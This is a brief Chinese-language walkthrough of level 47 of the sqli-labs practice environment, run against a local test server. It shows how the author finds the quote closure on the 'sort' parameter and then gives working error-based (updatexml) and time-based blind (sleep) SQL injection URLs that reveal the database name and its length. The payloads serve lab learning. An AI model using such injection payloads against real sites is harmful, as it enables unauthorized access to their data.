sqli-labs (less-47)
进入47关,我们发现跟less-46一样要我们输入sort值这里我们输入sort=1试试
http://127.0.0.1/sql1/Less-47/?sort=1'
根据错误显示判断闭合方式为’–+,并且为字符型注入,因为有完整错误回显,所以这里可以使用报错注入攻击和时间盲注
报错注入攻击
查看当前库
http://127.0.0.1/sql1/Less-47/?sort=1' and updatexml(1,concat(0x7e,(database()),0x7e),1)--+
接下来的步骤与less-46一模一样,这里我不具体介绍,具体过程请看我的less-46
时间盲注
查看当前数据库长度
http://127.0.0.1/sql1/Less-47/?sort=1' and if(length(database())=8,1,sleep(2))--+
页面快速反应,证明当前数据库长度为8
接下来的步骤与less-46一模一样,这里我不具体介绍,具体过程请看我的less-46